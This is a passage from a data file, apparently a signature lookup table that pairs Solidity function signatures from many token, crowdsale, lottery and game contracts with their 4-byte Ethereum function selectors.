"0xb9b2a890", "bet(uint32,uint8[4])": "0xb107e815", "abcLotto()": "0xbc30e4ac", "add_32(uint32,uint32)": "0xbb0db551", "sub_32(uint32,uint32)": "0xf42ca2ee", "LinqToken()": "0x466551f1", "setMaxEscrow(uint256)": "0xc6a4d345", "setMinEscrow(uint256)": "0xe6bb88b3", "Activate()": "0x59d3ce47", "getAmountBonusRate()": "0xd24155c1", "getCurrentTimeRate()": "0x09f03da2", "setContactInfo(string)": "0xd7b2aae6", "roleRemove(address,string)": "0x1ee185ad", "roleAdd(address,string)": "0x6f625567", "finalizeCapReached()": "0x75c3039c", "Launched()": "0xba61a960", "Completed()": "0xe06452d0", "token_decimals()": "0x3c4b303d", "token_symbol()": "0x1f772a34", "token_name()": "0x947a3168", "dbVal(address,uint256)": "0xa26b0e34", "releaseAllatOnce()": "0xee8a4ee2", "releaseSingleAm()": "0xa888e4c9", "sendAndFreeze(address,uint256,uint64)": "0x4512b39b", "getFrozenAmData(address,uint256)": "0x363ad06f", "numbOfFrozenAmCount(address)": "0xa5def8cb", "INGCL()": "0x5129096c", "roulette(uint256)": "0x367488ce", "setContractPrice(uint256)": "0x132c3bea", "Giorgi()": "0x7e1e1ff6", "ForestCoin()": "0x72d8c1c7", "DLXV()": "0x0d6f72aa", "placeCube(uint64,uint64,uint64,uint256,uint256)": "0x967e8611", "increaseWorldCorner(uint64,uint64,uint64)": "0xee19bfb5", "packLocation(uint64,uint64,uint64)": "0x9c25d975", "MedsupplyToken()": "0xb75c7e62", "testTemp4()": "0x653cfd2f", "testTemp3()": "0xd5a9f356", "testTemp2()": "0x2b1c6982", "testTemp1()": "0x578cf4a9", "testStorage(uint256[],uint256[])": "0x078aa5af", "deleteElement()": "0xfd57e9f9", "pushElement(uint256)": "0x78321efb", "IBM()": "0xc1d75bea", "MaorTestCoin()": "0x26feba74", "NEWONE()": "0x41d03085", "VictorieumToken()": "0xd87bca3f", "votes()": "0xe168c3ec", "distributeTokensToMembers()": "0x9a6b607f", "distributeTokensToMembers(uint256,uint256)": "0x62135491", "userCount()": "0x07973ccf", "teamNameIndex(string)": "0x184d009b", "teamProfile(uint256)": "0xd0aac5cf", "teamCount()": "0x8caa0083", "freezeTeam()": "0xc467a317", "kickMember(address)": "0xd16a8fe7", "newMember(string,uint256)": "0x95523f7d", "newTeam(string,string)": "0x83347622", "ERC20Token(string,string,uint256)": "0x8a946339", "CrypcenToken()": "0x430a74b7", "deploySimpleContract(string,string,uint256)": "0x42587795", "testIt()": "0xf7cb8e66", "episodePurchase(uint256,address,uint256)": "0xd89fb919", "getEpisodeDetail(uint256)": "0x90cddcc5", "getEpisodeLength()": "0x2ea1f9aa", "isPurchasedEpisode(uint256,address)": "0xa3ad1676", "updateEpisode(uint256,string,uint256)": "0xf31b4e89", "createRandomDeveloper(string,uint256)": "0x0f79e1c7", "_generateRandomId(string)": "0x7f334bd1", "_createDeveloper(string,uint256,uint256)": "0x7314221e", "changeGamemaster(address)": "0x741c251d", "_resetPlayRound()": "0x479ba3a5", "_betterThan(address,address)": "0x9368f482", "_generateRandomNumber()": "0x56d3e57d", "_calculatePointsAndRewards()": "0x81bb1277", "getPlayerBetForPlayRound(address,uint256)": "0x0438ebce", "getPlayerBetForCurrentPlayRound(address)": "0xe666767b", "pastPlayRoundsCount()": "0x8fca3057", "closePlacingPhase()": "0x4a334c1c", "startPlacingPhase(uint256)": "0x07855f4f", "ERC20KKToken()": "0xfd6273a3", "buyShitClones()": "0xd9def89a", "sellShitClones()": "0x613f8dac", "makeShitClone(address)": "0x0abcbbcd", "ShitCloneFarmer()": "0xd7aa6d74", "RYH()": "0xd61ca7eb", "number_of_claims()": "0x6bd5084a", "B_Com()": "0x40229e14", "ANYtoken()": "0x37af5c32", "getCurrentlyRunningTier()": "0xa5c5463f", "ownerWithdrawUnspentCredits()": "0xea6955e5", "setTiersInfo(uint8,uint256[],uint256[],uint256[],uint256[],uint8[])": "0x6f03e307", "MIOTCrowdsales(address,address)": "0xcf1a6243", "addStorage(string)": "0x89273f15", "store(uint256,uint256)": "0x6ed28ed0", "QSHU()": "0xf2d2e1a7", "investtokens()": "0x5ff6e9d0", "setMinWei(uint256)": "0x10f1a274", "GetStatus(uint256)": "0x3f8126d5", "GetShipsByOwner(address)": "0xbef90b94", "Getwsic(uint256)": "0xc30ed0a4", "SetStatus(uint256,uint256)": "0x86de99dd", "updateship(uint256,uint256)": "0xd4867694", "createship(uint256,address)": "0xfc756c69", "_update(uint256,uint256)": "0xf133a7c6", "_createship(uint256,address)": "0x31ee8277", "_translateWSIC(uint256)": "0x2c1e064b", "setSaleAuction(address)": "0xb527b0a6", "_isOfficialApps(address)": "0xc8c08a89", "nukeApps()": "0x43ca86c6", "AddOfficialApps(address)": "0xb90cec6d", "viewBeneficiaryDetails(address)": "0x3e2153bf", "closePool()": "0x66805de5", "getPoolDetails()": "0xaca34c11", "getCurrentBeneficiaryCap()": "0xf7b22fa2", "_receiveRefund()": "0x7809dd64", "_receiveDeposit()": "0x016c6601", "ETVRToken()": "0x277f6331", "DeskBellPresale()": "0xf187650d", "IcelandvsCroatia()": "0x5ccbddeb", "DummyOVOToken()": "0x856cddb0", "rocketLaunch(uint256)": "0x3b20c3f3", "rocketAddFunds(uint256,uint256,uint256)": "0x927e434b", "rocketSetResourcePrice(uint256,uint256,uint256)": "0x0f8a8887", "rocketGetResourceValues(uint256)": "0x80e039f9", "rocketTimeUntilMoon(uint256)": "0xf7749e32", "decreaseArrivalTime(uint256,uint256)": "0x5bd5e89c", "increaseArrivalTime(uint256,uint256)": "0xb6fef44c", "rocketArrivalTime(uint256)": "0x2fffe0dd", "rocketIsLaunched(uint256)": "0x67669e29", "rocketBlocksUntilAllowedToLaunch()": "0x0761c57a", "rocketTravelTime(uint256)": "0x1136aa64", "rocketTravelTimeByResource(uint256,uint256)": "0xbb35f7ee", "discoverResources(uint256)": "0x12f3d1e0", "discoveryBlocksUntilAllowed(uint256)": "0x5ef505c0", "discoveryPrice(uint256)": "0x255884ae", "discoveryCooldown(uint256)": "0x229063fc", "cityTransferResources(uint256,uint256,uint256,uint256)": "0xaaa05e20", "getCityResourceRichness(uint256)": "0xa7cc440e", "getCityResources(uint256)": "0x97ea403d", "setRocketValues(uint256[],uint256,uint256[],uint256[],uint256[])": "0x80a15ad9", "setCityValues(uint256[],uint256,uint256[],uint256[])": "0x94224066", "setConfiguration(uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x319a30d4", "setContractActive(bool)": "0x970388b5", "setSubcontinentDiscoveryVotingContract(address)": "0x60ee66c9", "RocketsAndResources()": "0xa687be48", "claim_ico()": "0x5849f66b", "add_to_ico()": "0xad906661", "RentToken()": "0xbb6c1178", "withdrawTokensFor(address)": "0x92df61e8", "_inverseGetTokenAmount(address,uint256)": "0xbd2560a0", "_getTokenAmount(address,uint256)": "0x61ddf923", "killswitch()": "0x42dd96f7", "safeTransferFromWithData(address,address,uint256,bytes)": "0x60a11672", "DeusToken()": "0x7c97ffe2", "TakeOffWorldWide()": "0xc5bd8456", "PRTC()": "0xb1dbeb37", "MeibangAccumulationAppreciationAllocation(uint256,string,uint8,string)": "0xac0b1786", "UIOCOIN(uint256,string,uint8,string)": "0xbce5fc53", "IntroToken()": "0x11f48166", "FintechnicsPublic()": "0xb19b1550", "_createReleaseAuction(uint256,uint256,uint256,uint256,uint256)": "0x45a3c7c6", "withdrawRest()": "0xef660169", "weeksFromEndPlusMonth()": "0xe5b28c07", "weeksFromEnd()": "0xf70f1821", "totalWithdrawn(address)": "0x0a64143a", "fractionalize(address)": "0x575eaf98", "massClaimLimited(uint256,uint256)": "0x3348f537", "massClaim()": "0xee3d2f07", "forceRefundState()": "0x123802e1", "unwhitelistAddresses(address[])": "0x88a2653c", "setRateAndStart(uint256,uint256,uint256)": "0xbbd4271f", "CryptoHuntIco(uint256,uint256,address,address)": "0xfced4a86", "DANSToken(address,address,uint256,uint256,uint256,address,uint256,address,uint256,address,uint256)": "0xbaa290d9", "EthBita()": "0xd53bb6ac", "ReputationToken()": "0x1609b182", "withdrawBNB()": "0x1d111d13", "forceCrowdsaleRefund()": "0x62024dce", "RBA()": "0xdbd05767", "Gavinhereum(uint256,string,string)": "0xc07653af", "SportsChainToken()": "0x195aa377", "withdrawOverpay()": "0x1982c626", "TIME_TO_COOK()": "0x987f710a", "allocate5ProjectToken()": "0x492e333f", "basecost()": "0xbcf83634", "setPriceToPreSale()": "0xe5e4807f", "dollarToEtherRatio()": "0xf46ff44f", "capitalLedger()": "0x13f52533", "pregnantBots()": "0x4e4081ef", "purchaseCap()": "0xab0fe874", "icoEndLine()": "0x882e2606", "feeDecimals()": "0xcc0f1786", "stage3()": "0x94e0d371", "changeable()": "0x951b26a3", "maxLevels()": "0x6f38e410", "optInXferGas()": "0x766719f0", "DISTRIBUTION_INVESTORS()": "0x2f0c59e7", "ReserveFund()": "0xc80bbb17", "advisersPeriodsNumber()": "0x417d5fb4", "NUM_COIN_PER_AXIE()": "0xb1718455", "firstPreSaleEndDate2()": "0x4d50d5f2", "PREICO_BONUS()": "0x76636e73", "oracleMasterCopy()": "0x5b96c1e7", "IcoAddress()": "0x4eb1483d", "emergencyMode()": "0x0905f560", "correctOriginalSupply()": "0x6e787a48", "thankYou()": "0x2d480a80", "tokensUnlockPeriod()": "0xf3aee9f9", "initialSaleEndDate()": "0xc23da3a9", "canClaim()": "0x6dc7a627", "ecosystemSupply()": "0x13abdd75", "information()": "0xf47b7740", "phase_1_rate()": "0x9bf677e4", "transactionfee()": "0x751559e8", "withdrawCommunityPot()": "0xae9c1962", "FAPFund()": "0xb49651ef", "icoPreEnded()": "0x1973c5de", "ETHFee()": "0x2619ba7f", "tokensForPlatform()": "0x25bd713f", "tenEndTime()": "0x4f6754d7", "NameInt()": "0x1318cd2d", "getDeletedTeams()": "0xcc9f28ea", "minWeiInvestment()": "0x8d656b83", "MAXCAP_TOKENS_PRE_ICO()": "0x2ad64a4d", "jackpotPersent()": "0x52a08c29", "totalFundingAmount()": "0x8aea2f6e", "CurrentARXSupplyInWei()": "0xae529499", "preSaleOpened()": "0x65538da0", "ownerA()": "0xe06f3d38", "timeExpires()": "0x89bcf968", "returnUnsoldSafeXLarge()": "0x7bb43e6e", "amountOfOwners()": "0x5261ee83", "isControlled()": "0xd915562b", "SPINFundDeposit()": "0x9ba4eb5f", "operation()": "0x775fc127", "getNumTanks()": "0xd1ff8151", "getChargers()": "0xfa825185", "tournamentQueueSize()": "0x1ba5e63f", "retraitStandard_2()": "0x871625e2", "episodesNum()": "0xcb01c70c", "dividendParentsPercentage()": "0x8a331846", "closeCrowd()": "0xd5572bd6", "KJCPerEthereum()": "0x8eeb3b0e", "WOLF3()": "0xc956db57", "isSaleComplete()": "0xc31c0b62", "MIN_WITHDRAW_WEI()": "0x93e426de", "managerSet()": "0x4bb8596e", "maxMint()": "0x7501f741", "STARTING_CraigGrant()": "0x9c71efef", "TOKEN_NAME()": "0x18821400", "round2StartTime()": "0xbb17c8cc", "maxMintingPower()": "0x54f63105", "ICO_TWO()": "0xbb814746", "NZD_CLEAR()": "0xc6e9ce11", "playerBudget()": "0x622a0a19", "_generation()": "0xd4f3dd84", "txorigin()": "0x2c7622b0", "PRE_SALE_START_4()": "0xa594b29b", "delay()": "0x6a42b8f8", "bonusEnds2()": "0xe773c82f", "directSellRate()": "0x4e876ecc", "fundReserve()": "0x6f9c3c8f", "maxContributionPhase1()": "0x62f5c2e3", "foundersAmountLeft()": "0x98951bfc", "feeInBps()": "0xa0a7299b", "unfrozenTokens()": "0x8356027e", "preSaleTokensDisbursed()": "0xd26dbd2a", "preservedTokens()": "0x02942724", "PRE_BONUS()": "0xaebacd53", "icoBuy()": "0x53ceee6c", "startAcceptingDonation()": "0xe67e04f9", "Raffle_Finished()": "0xd9ea1b47", "kwhFund()": "0x76793f47", "jpPercentageDivisor()": "0xc73202ff", "lockAdvisorsTokens()": "0xac5d67e9", "refunding()": "0xf43e98c7", "brag()": "0xec64f52f", "CAUSE()": "0x465d6e1a", "IADForGas()": "0xae601e4d", "migrateAddress()": "0x4b8d12f0", "limitClosedSale()": "0x48da60af", "isEnoughConfirmed(bytes,uint256)": "0x098b939a", "isMajorityConfirmed(bytes)": "0xcb1e4389", "isConfirmedBy(bytes,address)": "0xfafd6bcb", "isConfirmed(bytes)": "0xaa954845", "checkData(bytes)": "0x9d0506ae", "rebuildManagerList()": "0x71145486", "internalAddManager(address)": "0xc1e50f3c", "internalRemoveManager(address)": "0x8ba88c9c", "replaceManager(address,address)": "0x01d8715f", "setMajorityThreshold(uint256)": "0x3d4ba37a", "getMajorityThreshold()": "0xb43716a0", "isAddressManager(address)": "0x7c2b606a", "managersCount()": "0x6308ae65", "EthRelief(address)": "0xe566be4e", "getownerInfo(address)": "0xbd4cfadf", "getprizeamount()": "0xb3f3668c", "getlistedItems()": "0x49386f26", "getenddate()": "0x0757114e", "setownerInfo(address,bytes32,bytes32,bytes32)": "0x4a701fc3", "calculatePrizeCut(uint256)": "0x65d73851", "addItem(uint256,uint256)": "0xa2125232", "listItem(uint256,uint256,address,bytes32)": "0x654c7381", "listMultipleItems(uint256[],uint256[],address,bytes32[])": "0x84048497", "awardprize(uint256)": "0x443f45a4", "setReferralTokenContract(address)": "0xc9838930", "ParallelWorld()": "0x96b5f7b6", "BLMToken(uint256,uint256)": "0x8ea06c68", "OctusToken()": "0x8d317de2", "Crypterium()": "0x7871a9ff", "CBRToken(uint256,string,string)": "0x68873375", "releaseMultiByStage(address[])": "0xf211c9ed", "releaseAllOldBalanceOf(address[])": "0xf4ab2b19", "ZhuhuaToken()": "0x0bb7a81a", "addCar(string,address,uint256,uint256,uint256)": "0xdaef4df8", "addMake(string,address,uint256,uint256)": "0xfba7c1ab", "addCompany(string,address,uint256)": "0x6caabc6f", "getAdv(uint256,uint256)": "0x874f8ef6", "purchaseCard(uint256,uint256)": "0x68fcb6ee", "purchaseAdv(uint256,uint256,string,string)": "0xd6ddbd2d", "setMinBetForOraclize(uint256)": "0x7c10e00e", "Yuzhuralzoloto_2()": "0xd04737bd", "eosDACToken()": "0xc5bafbc4", "getStatusInfo()": "0xe91c3a3e", "availableTokensOnCurrentStage()": "0x73e538fc", "onBalance()": "0xbfdc35f2", "holdTokensOnStage()": "0xe2356efd", "AddressDefault()": "0xe4f4c554", "KimJCoin()": "0x405cb7f6", "calculateDiceWinner(bytes32,bytes32,uint256)": "0x5a851ffb", "calculateDiceProfit(uint256,uint256)": "0xfe1d470d", "processDiceBet(uint256,uint256,int256,bytes32,bytes32)": "0x5c58ad8e", "withdrawPendingBalance(address)": "0x9eb7d170", "resetBalance()": "0x20f5e8dd", "setMaxBetAmount(uint256,uint256)": "0xcdfbc437", "getContractData()": "0xa68b91ab", "getBetCount()": "0xb93dab0b", "getMaxBetAmount(uint256)": "0x434b635e", "getPendingBalance(address)": "0x51d550d2", "SmartDice()": "0x6423690f", "setProxyCurator(address)": "0x1c7040cc", "enableDisableTokenProxy()": "0xeffbbf92", "setProxyManagementAddress(address)": "0x090ea6f3", "MacroProxyContract()": "0x6997f429", "ZiipToken()": "0x7c0012d4", "Payiza()": "0x3889c8dc", "WhosTheBossNow()": "0xb256dd6e", "AkiCoin(address)": "0x337a693c", "TokenBCC(uint256,string,string)": "0x09f2b6a9", "BIPOOH_DAO_32_a()": "0x52e0d0fa", "MithrilMace()": "0xbfbaa54d", "_prand()": "0x266c2132", "drainMe(uint256)": "0x7f09ad64", "BugBountyOne()": "0x21751df9", "getSecret()": "0x5b9fdc30", "BugBountyOneBreaker()": "0xf31bebaf", "createSale(uint256,uint256)": "0x6019061b", "getNewShroom(uint256)": "0xac7a95d5", "_move(uint256,address,address)": "0x2a35d251", "_create(uint256,address)": "0xb9043235", "setKitty(address)": "0x994ff619", "SelflleryYouToken()": "0x954b2be9", "NBAT001(address,address,address,address,address)": "0xf8fb4ab7", "IBTC(uint256,string,string)": "0xae8cdd59", "readCharityAddress()": "0xbbc39ab6", "charityCutOf(uint256)": "0xc3f6263f", "previousPriceOf(uint256)": "0xf717442a", "listItem(uint256,uint256,address,uint256)": "0x8564b2cd", "listMultipleItems(uint256[],uint256,address,uint256)": "0x93470fa8", "setCharity(address)": "0xfb6f71a3", "TryCoin()": "0xe75e69d6", "escrowAmount(address,uint256)": "0x2a8014ca", "newTokens(address,uint256)": "0x4c985dfb", "bountyTransfers()": "0x199d743a", "becomeRichest()": "0x69934ee7", "WithdrawalContract()": "0xbd06aa84", "updateParticipantCapTier2(uint256)": "0x842bfad2", "updateParticipantCapTier1(uint256)": "0x090d993a", "updatePoolAddressCapTier2(uint256)": "0xbf2b7524", "updatePoolAddressCapTier1(uint256)": "0xd4ed8990", "extendPublicSaleDiscountEndTime(uint256)": "0xfe1829b6", "BP_SPARTAN()": "0xe7e481c5", "TOKEN_FOUNDATION_CAP()": "0x84fd7ef0", "DATE_01_JUN_2018()": "0xea58ca03", "secondRefundPollDate()": "0xb465e52f", "setSalesFinished()": "0x08946081", "balanceOfEnvelopes()": "0xb6e119ab", "final_fundraise()": "0x958b3f20", "PRE_SALE_15_BONUS_MIN()": "0xa8fe5465", "checkRate()": "0xe132db41", "gntContractAddress()": "0xb58dff99", "pgoInternalReserveWallet()": "0xa90135df", "releaseValue1()": "0xa1d280d3", "hit()": "0x2ae3594a", "numOfTokens()": "0xcd17c4b6", "tradingFeePercentage()": "0xb2356ad4", "PRICE_AFTER_SOFTCAP()": "0xa526f74f", "endRoundSeed()": "0x557dc796", "totalAmountToWhale()": "0x6a98085a", "bonusLevel100()": "0x83b8c8f6", "niceguy3()": "0xdd5f63fd", "polyComplianceAddress()": "0x95a13ff3", "bridge()": "0xe78cea92", "ETH_SIGN_TYPED_DATA_ARGHASH()": "0xf797f7b6", "creatorsPoolMintQuota()": "0x8fda5c8e", "PoolTeam()": "0xc751e027", "lowestBid()": "0xb6f3d256", "approver()": "0x141a8dd8", "GEN_0_LIMIT()": "0xddf6e5a0", "bountyMinted()": "0x8b87e3b6", "STRegistrar()": "0x64245502", "sellerCut()": "0xbba33ace", "blockVContractAddr()": "0x4030ddc0", "tokenCreateUtcTimeInSec()": "0xf37b916a", "ADV_TEAM_LOCK_TIME()": "0x6d9c2bda", "STAGE_FOUNDATION()": "0xb231e5cd", "membersWhiteList()": "0x0aa1ee4c", "creationInvestmenting()": "0xd9d8b2ee", "Emitter()": "0x265cfbbc", "allocateMarket_CommunitTokens()": "0xdfcb737f", "INITIAL_EARLYBIRD_TOKENS()": "0x84317143", "withdrawToMultisig()": "0xc722328d", "rateStage1()": "0x78080c9d", "MVM()": "0x5a388a43", "isICOClosed()": "0xc97ab7ca", "totalPreBuyers()": "0x66f3a2b8", "targetCrowdsale()": "0x277b6527", "ICOdeadline()": "0x936c9bc9", "info_TotalSupply()": "0x4f284594", "returnUnsoldSafeSmall()": "0x581f1125", "PRIVATE()": "0x55072fef", "phase_1_Time()": "0xf7892887", "_wallet()": "0x610757e4", "tranchesCount()": "0x6d05da7e", "weiPending()": "0xe77cfa1c", "saleMinimumWei()": "0x8ed08711", "identifier()": "0x7998a1c4", "finalWindowTime()": "0xf098f8e4", "window3TokenExchangeRate()": "0xdd42faf7", "generatedByte()": "0x284b1e8e", "genLevelExpGain()": "0x27979b35", "allowDirectDebit()": "0x9933a24a", "accBonusTokens()": "0x3b305964", "minimalInvestmentInWei()": "0x6e80a869", "candyper()": "0x6f54e4df", "TOTAL_SOLD_TOKEN_SUPPLY_LIMIT()": "0x0acdd69f", "icoDiscountLevel1()": "0x19e6ab23", "created()": "0x325a19f1", "ICOSTART()": "0x94992b76", "_batch4_icosaleEndTimestamp()": "0x78a17883", "finanReserveTimeLock()": "0xefcf6d68", "allowReferrals()": "0x8329df0a", "zTransferWinningBets()": "0x5a1a1b67", "airdrop_cnt()": "0x0465a76d", "usdPerEther()": "0x4a046d82", "currentTotalAirdrop()": "0x1ba5b3e8", "unhalt_30day()": "0x8c00ce76", "btg()": "0xfd793c76", "tokenIsLocked()": "0x77f51246", "PUBLIC_SALES_3_PERIOD_END()": "0xd5119402", "teamGrantsAmount()": "0x53a5e2d9", "eleventhTime()": "0x4d77551a", "getMax(uint32[])": "0x3a05369f", "phase_1_bonus()": "0xaa4b980e", "wei20()": "0xba029c97", "collectedAddressesCount()": "0x5c39c1ab", "presetGymTrainer()": "0xfb214f4c", "midasDeposit()": "0x904a7d4c", "buyExchangeRate()": "0xdb1366bf", "raffleId()": "0xb375603c", "claimC1()": "0xad11cc1d", "RELEASE_EPOCH()": "0xc8e788c1", "currentSubRound()": "0xc215e800", "shieldsUp()": "0x47a0fd7e", "oresLeft()": "0x76c2c0aa", "exchangeRates()": "0x4ffcd9df", "_multiSendOwner()": "0xc2944f69", "pendingBetsBalance()": "0x000e60f8", "workingState()": "0xa099ad85", "GetMaxEther()": "0x2f6a638b", "month12companyUnlock()": "0x711bfa89", "mint(uint256,string,uint256,uint256,address)": "0x310f4cdd", "getCarType(uint256)": "0x5c9a7a8b", "isCarSpecial(uint256)": "0x4060d9f5", "returnGrantedToken(uint256)": "0x3252b8fb", "redeemVestableToken(address)": "0xce8d096d", "calcVestableToken(address)": "0x696d25fb", "grantTokenStartNow(address,uint256,uint256,uint256)": "0x2f3423b8", "grantToken(address,uint256,uint256,uint256,uint256)": "0x6631ff1d", "vestBalanceOf(address)": "0xe33d28d7", "nominsReceivedForEther(uint256)": "0xaa2efbad", "havvensReceivedForEther(uint256)": "0x1bca5689", "havvensReceivedForNomins(uint256)": "0x5ae59132", "withdrawNomins(uint256)": "0xe9c6ed11", "exchangeNominsForHavvensAtRate(uint256,uint256)": "0x2ff9f017", "exchangeNominsForHavvens(uint256)": "0x493b284e", "exchangeEtherForHavvensAtRate(uint256,uint256)": "0xbc64059b", "exchangeEtherForNominsAtRate(uint256)": "0x62b45318", "updatePrices(uint256,uint256,uint256)": "0x3ed620a4", "Prototype()": "0x30e5be52", "MeiJiuToken(uint256,string,uint8,string)": "0xe46da1b9", "modCFOAddress(address)": "0xf04893c2", "modCEOAddress(address)": "0x827037d6", "JCWCToken(uint256,string,string)": "0x09959a95", "QToken(address,uint256)": "0x1baf1494", "CmmToken()": "0x8b36ed08", "AkonCoin()": "0xf6ca75d8", "isvalidOrg(address,address)": "0x2b7d177b", "getCertificateInfoByNo(address,uint8)": "0xa7d512d6", "getOrgInfo(address)": "0xc9295bc6", "getVerifiedInfo(address,address,string)": "0x534b0391", "updateVerifiedSign(address,address,string,uint8,string)": "0x85e5f08a", "addVerifiedInfo(address,address,string,uint8,string,string)": "0x350ee628", "addOrgCertificate(string)": "0x7e380099", "updateWebsite(address,address,string)": "0x06ba089a", "updateValidOrg(address,address,bool)": "0x91f85480", "addOrg(address,address,string,string,string,string,uint8)": "0x0a7a783a", "bitbgcToken()": "0xab4bc414", "setRegistryLogic(address)": "0x19354750", "SIACASHCOIN()": "0x22f48627", "Smartcarblockchain(address,uint256)": "0x8e0f9b85", "ZToken(uint256,string,uint8,string)": "0xc630f96b", "HCTToken()": "0xdb480704", "FiO()": "0xa7ead565", "TRCToken(uint256,string,string)": "0x7e71496b", "setOwnerValidateAddress(address)": "0x50e86e1e", "MainContract(string,address,address,string)": "0x20f0c28f", "setAllowed(address,address,uint256)": "0x33dd1b8a", "subtractAllowed(address,address,uint256)": "0xd8fd7ae3", "transferFromOwn(address,uint256)": "0xe00a7fc5", "subtractBalance(address,address,uint256)": "0x26a3bd4e", "transferProcess(address,address,uint256)": "0x850fb62d", "setOffChainManagerAddress(address)": "0x37d1eb35", "redenominate(uint256)": "0xca2156bd", "redenominatedValue(uint256)": "0x99fdc17e", "TokenContractImpl(uint256,uint8,address,address)": "0x9bd03774", "isToOffChainAddresses(address[])": "0xfceb9852", "removeOffChainAddresses(address[])": "0xc0be3e9a", "addOffChainAddresses(address[])": "0x71868032", "removeOffChainAddress(address,address)": "0x76cb6f9b", "addOffChainAddress(address,address)": "0x50d80fef", "setOwnerValidatorAddress(address)": "0x5ddf2998", "setRootAddress(address,address)": "0x1708a723", "OffChainManagerImpl(address,address)": "0x5cf625f0", "isToOffChainAddress(address)": "0x3a8468f7", "sendFromOwn(address,uint256)": "0x7e621667", "indexOfOwners(address,address)": "0x6e46408d", "OwnerValidatorImpl()": "0xf383d6b9", "setWorking(bool)": "0x6fb3ba9e", "ownerValidate(address)": "0xb43545bb", "transferFromSender(address,uint256)": "0xbae804a7", "generateLockupTokensDelegationSchemaHash(address,uint256,bytes32)": "0xe7cc8ded", "generateReleaseTokensSchemaHash(address,address,uint256,bytes32)": "0xdbbdad8c", "generateVoteForDelegationSchemaHash(uint16,address,bytes32,address)": "0xc83126ed", "generateAddAddressSchemaHash(address,bytes32)": "0x23f809f6", "generateRevokeStakeForDelegationSchemaHash(uint256,uint256)": "0xbab6f9bf", "generateStakeForDelegationSchemaHash(address,uint256,bytes32,bytes32,uint256[],bytes32,uint256)": "0x58469cd1", "generateContestForDelegationSchemaHash(address,uint256,bytes32)": "0xcea81ab1", "generateAttestForDelegationSchemaHash(address,address,uint256,bytes32,bytes32,uint256[],bytes32)": "0x9662355e", "generateRequestAttestationSchemaHash(address,address,address,bytes32,uint256[],bytes32)": "0x520bbba3", "removeAddressFromAccount(address,address)": "0x84a97ab7", "addAddressToAccount(address,address)": "0x275bf230", "createNewAccount(address)": "0x4f96baf1", "addressBelongsToAccount(address,address)": "0x00f545c6", "accountIdForAddress(address,address)": "0xf391f074", "voteForUser(uint16,address)": "0xcc5061da", "voteFor(uint16,address,bytes32,bytes)": "0x1066cd3c", "vote(uint16)": "0xddb6e116", "isValidIPFSMultihash(bytes)": "0x2e9a06fd", "setManualOverride(bool)": "0x35967501", "changeMakerDAO(address)": "0x9b815057", "BlocktekUniversity(address)": "0x2fcd6075", "calceth(uint256)": "0x5befbb9b", "calckeys(uint256)": "0x30106b17", "setPreActiveTime(uint256)": "0x0a262f48", "genLimit(uint256)": "0x7d2d661f", "EMIToken()": "0xe73cf000", "TokenGreeneum(uint256,string,uint8,string)": "0xb2e545ac", "setOtherRich3D(address)": "0x3b441344", "BiboToken()": "0x98cc223f", "HELP4HUMANITY()": "0x916be4fe", "depositAddress()": "0x28f833b7", "quarterThird()": "0xc1de0842", "overdraftPeriodLength()": "0x51eb5e93", "dropOffset()": "0xbb7cb80b", "targetUser()": "0xc255343e", "unlockedAddress()": "0x377481ca", "bancorETHToken()": "0xf5d09ff7", "icoIsFinishedDate()": "0x3a07e78a", "tokenBaseURI()": "0x4e99b800", "BASE_PRICE_IN_WEI()": "0x09ad9dd3", "nextLotteryTTMTokenId10()": "0xa96594d3", "BIRTHDAY()": "0xa609e209", "addressSCEscrow()": "0xb60eb800", "totalSecondICOSupply()": "0x87182d47", "teamLockUp()": "0xc7c80f02", "TotalDividendsPerShare()": "0x40512dcc", "contractPreICO()": "0x2e3acf6b", "InitialSupply()": "0x1eb25d13", "finishWhen()": "0xaadba3dc", "Explain()": "0x562ea884", "ONE_DAY()": "0x863e76db", "DST_ICO()": "0x4fad96dd", "maxAbsKindness()": "0x3edc69b8", "maxTIPSupply()": "0x5385726e", "teamEthContract()": "0x8f790507", "whitelistBonusLockPeriod()": "0xd6604881", "singleIDXMQty()": "0xaa8675d1", "networkReserveFund()": "0xae0e5387", "arbitrationAddress()": "0x70505653", "fundAccount()": "0xd9a8748c", "tokensReleasedToEarlyInvestor()": "0x90bf495d", "maxAllowedTakerBetsPerMakerBet()": "0xbbd974cc", "lockupContract()": "0x0a6ee947", "round_after()": "0x42b614a9", "publicsalesCap()": "0xba2e84f9", "paymentNumber()": "0x050c931d", "name_()": "0xe2b9e186", "incrementDivisor()": "0xa7ace55d", "usedPositions()": "0x6b65be60", "bountyFundManager()": "0xc8c0b288", "tokenRewardRate()": "0x5660000a", "SecondLevelCost()": "0x07256175", "m_KYCProvider()": "0xe2ba6ce8", "checkMonthlyLimit()": "0xa9ac4c5f", "bonus1()": "0x30818189", "rewardDistributedUnits()": "0xb553b715", "fixSale()": "0x256919c6", "ROLE_KNOWN_ORIGIN()": "0xbe46b94c", "teamReleased()": "0xf6f0fa8d", "DEVELOP_CAP_PER_ROUND()": "0x93d76f0e", "preIcoEndTime()": "0x716344f0", "maxWhitelistPurchaseWei()": "0x8d64bcf1", "DragonsBurned()": "0xb4f14b2b", "startedWorkTS()": "0xcc9c0936", "remForSalesBeforeStageLast()": "0xe6471555", "operate()": "0x7159a618", "ICO_MIN_DEPOSIT()": "0x68347fdf", "totalWithdraw()": "0x455fd623", "BOUNTY_FUND()": "0x749510d4", "totalBondSupply_BEAR()": "0x40557e87", "secondRoundICOTokensLimit()": "0xda66cb3e", "weiDistributed()": "0xb4c91611", "MAYExchangeRate()": "0xa952f268", "organizers_percent()": "0x256f992b", "pIDIndex_()": "0x08ae8677", "VERSION_NUMBER()": "0x8025e303", "Ozreal()": "0x5370e3d4", "Etheremojis()": "0xdf0cd37b", "developerFunds()": "0x55eed9de", "totalCoinLock()": "0x6f020775", "TOTAL_AIRDROPPED_TOKENS()": "0x45a743d1", "totalPeriod()": "0xce14a46e", "STARTING_DINO()": "0x9c9d07c1", "nextPayeeIndex()": "0x08604366", "teamTokensFirstShare()": "0x7def7351", "removeFunder()": "0xcfd32aa0", "btcLastUpdate()": "0xd0bf9502", "startSweepStake()": "0x1308e9e0", "ETHUSD()": "0x73db0844", "secondroundprice()": "0x86e8c57a", "sigTeamAndAdvisersAddress()": "0x40a72363", "theWinnernumber()": "0xcd5ecd60", "fundedProxy()": "0xed5bc87b", "MIN_BANKROLL()": "0x9b0b5bb2", "date15Nov2018()": "0x0bc59a8e", "KPOP_ITEM_CONTRACT_ADDRESS()": "0x2f66d5a7", 